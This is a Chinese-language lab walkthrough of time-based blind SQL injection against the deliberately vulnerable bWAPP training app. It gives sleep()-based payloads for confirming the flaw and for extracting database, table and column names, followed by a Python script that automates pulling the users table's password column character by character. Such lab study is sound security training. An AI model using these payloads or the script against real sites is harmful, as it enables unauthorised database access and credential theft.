靶机:bWAPP
bug:SQL Injection-Blind-Time-Based
难度等级:low
分析
无论输入什么字符串,都会返回“The result will be sent by e-mail...”。因此首先要确定该处是否存在注入。因此这里可以参考基于时间的注入方法。本文使用主要使用if(exp1,exp2,exp3)及sleep函数,根据网络的延迟去判断是否发生注入。
为了判断处是否存在注入,分别构建了一下两条命令:
- Man of Steel' and if(1=1,sleep(50),1)#
- Man of Steel' and if(1=2,sleep(50),1)#
如果存在注入,命令1中的sleep(50)将会生效,返回数据的延迟会很高;命令2中的sleep(50)不会生效,返回数据的延迟不会很高。
经过多次测试,可以看出来命令1的延迟远高于命令2。因此,此处存在注入。
猜解数据库
猜解数据库名称
接下来根据网络延时猜解数据库名称。在猜解数据库名称前首先猜解数据库名称的长度。
“Man of Steel' and if(length(database())=5,sleep(50),1)#”
接下来猜解数据库中包含的表名称。在猜解名称前先猜解所有表格的长度和。
“Man of Steel' and if((select length(group_concat(table_name)) from information_schema.tables where table_schema='bWAPP')=33,sleep(5),1)#”
猜解表格名称
接下来猜解数据库中包含的表名称。在猜解名称前先猜解所有表格的长度和。
“Man of Steel' and if((select length(group_concat(table_name)) from information_schema.tables where table_schema='bWAPP')=33,sleep(5),1)#”
接着猜解表名。
“Man of Steel' and if(ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema='bWAPP'),1,1))=21,sleep(5),1)#”
猜解列名称
猜解表格的列名称。在猜解表格列名称前先猜所有列名称长度。
“Man of Steel' and if((select length(group_concat(column_name)) from information_schema.columns where table_name='users')=11,sleep(5),1)#”
猜解列的名称
“Man of Steel' and if(ascii(mid((select group_concat(column_name) from information_schema.columns where table_name='users'),1,1))=21,sleep(5),1)#”
猜解列的内容
猜解字段的值,首先猜解长度。
“Man of Steel' and if((select length(group_concat(id)) from users)=12,sleep(5),1)#”
猜解字段内容。
“Man of Steel' and if(ascii(mid((select group_concat(id) from users),1,1))=21,sleep(5),1)#”
代码
import requests
from urllib.parse import quote
headers={
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0',
'Referer': 'http://192.168.248.174/dvwa/bWAPP/sqli_4.php',
'Cookie': 'security_level=0; PHPSESSID=442s8ih8ft9d7h1a44jqjg46v1'
}
def guset_db_len():
len_of_db = 0
print('猜解数据库长度')
for i in range(1,6):
url = 'http://192.168.248.174/dvwa/bWAPP/sqli_15.php?title='
title='''Man of Steel' and if(length(database())=%s,sleep(3),1)#'''%i
title=quote(title)
url=url+title
r=requests.get(url,headers=headers)
#r.elapsed.seconds计算的是从发送请求到服务端响应回来这段时间(也就是时间差),
# 发送第一个数据到收到最后一个数据之间
if(r.elapsed.seconds>2.5):
print('length of database:',i)
len_of_db=i
continue
return len_of_db
def guest_db_name(len_of_db):
name_db = ''
char_list = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
print('猜解数据库名称')
for i in range(1,len_of_db+1):
for k in char_list:
k1=ord(k)
url = 'http://192.168.248.174/dvwa/bWAPP/sqli_15.php?title='
title = '''Man of Steel' and if(ascii(mid(database(),%s,1))=%s,sleep(5),1)#''' %(i,ord(k))
url = url + quote(title)
r = requests.get(url, headers=headers)
if (r.elapsed.seconds > 4.5):
name_db=name_db+k
print('第%s位:%s' %(i,k))
print('name of database:', name_db)
def guest_table_name_len():
len_of_tables = 0
char_list = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,'
tables_name=''
print('表长度的总和')
for i in range(2, 40):
url = 'http://192.168.248.174/dvwa/bWAPP/sqli_15.php?title='
title = '''Man of Steel' and if((select length(group_concat(table_name)) from information_schema.tables where table_schema='bWAPP')=%s,sleep(5),1)#''' % i
title = quote(title)
url = url + title
r = requests.get(url, headers=headers)
# r.elapsed.seconds计算的是从发送请求到服务端响应回来这段时间(也就是时间差),
# 发送第一个数据到收到最后一个数据之间
if (r.elapsed.seconds > 4.5):
print('length of tables:', i)
len_of_tables = i
continue
print('猜解数据库名称')
for i in range(1, len_of_tables + 1):
for k in char_list:
k1 = ord(k)
url = 'http://192.168.248.174/dvwa/bWAPP/sqli_15.php?title='
title = '''Man of Steel' and if(ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema='bWAPP'),%s,1))=%s,sleep(5),1)#'''%(i,k1)
title = quote(title)
url = url + title
r = requests.get(url, headers=headers)
if (r.elapsed.seconds > 4.5):
tables_name = tables_name + k
print('第%s位:%s' % (i, k))
print('name of tables:', tables_name)
def guest_name_columns():
len_of_columns = 0
char_list = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,'
columns_name = ''
print('列长度的总和')
for i in range(2, 200):
url = 'http://192.168.248.174/dvwa/bWAPP/sqli_15.php?title='
title = '''Man of Steel' and if((select length(group_concat(column_name)) from information_schema.columns where table_name='users')=%s,sleep(5),1)#''' % i
title = quote(title)
url = url + title
r = requests.get(url, headers=headers)
# r.elapsed.seconds计算的是从发送请求到服务端响应回来这段时间(也就是时间差),
# 发送第一个数据到收到最后一个数据之间
if (r.elapsed.seconds > 4.5):
print('length of columns:', i)
len_of_columns = i
continue
print('猜解列名称')
for i in range(1, len_of_columns + 1):
for k in char_list:
k1 = ord(k)
url = 'http://192.168.248.174/dvwa/bWAPP/sqli_15.php?title='
title = '''Man of Steel' and if(ascii(mid((select group_concat(column_name) from information_schema.columns where table_name='users'),%s,1))=%s,sleep(5),1)#''' % (i,k1)
title = quote(title)
url = url + title
r = requests.get(url, headers=headers)
if (r.elapsed.seconds > 4.5):
columns_name = columns_name + k
print('第%s位:%s' % (i, k))
print('name of columns:', columns_name)
def guest_columns_content():
len_columns_content = 0
char_list = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,1234567890'
columns_content = ''
columns_name='password'
print('列内容长度的总和')
for i in range(2, 400):
url = 'http://192.168.248.174/dvwa/bWAPP/sqli_15.php?title='
title = '''Man of Steel' and if((select length(group_concat(%s)) from users)=%s,sleep(5),1)#''' %(columns_name,i)
title = quote(title)
url = url + title
r = requests.get(url, headers=headers)
# r.elapsed.seconds计算的是从发送请求到服务端响应回来这段时间(也就是时间差),
# 发送第一个数据到收到最后一个数据之间
if (r.elapsed.seconds > 4.5):
print('length of columns content:', i)
len_columns_content = i
continue
print('列的内容')
for i in range(1, len_columns_content + 1):
for k in char_list:
k1 = ord(k)
url = 'http://192.168.248.174/dvwa/bWAPP/sqli_15.php?title='
title = '''Man of Steel' and if(ascii(mid((select group_concat(%s) from users),%s,1))=%s,sleep(5),1)#''' % (columns_name,i, k1)
title = quote(title)
url = url + title
r = requests.get(url, headers=headers)
if (r.elapsed.seconds > 4.5):
columns_content = columns_content + k
print('第%s位:%s' % (i, k))
print('columns_content:', columns_content)
if __name__=='__main__':
#guest_db_name(5)
#guest_table_name_len()
#guest_name_columns()
guest_columns_content()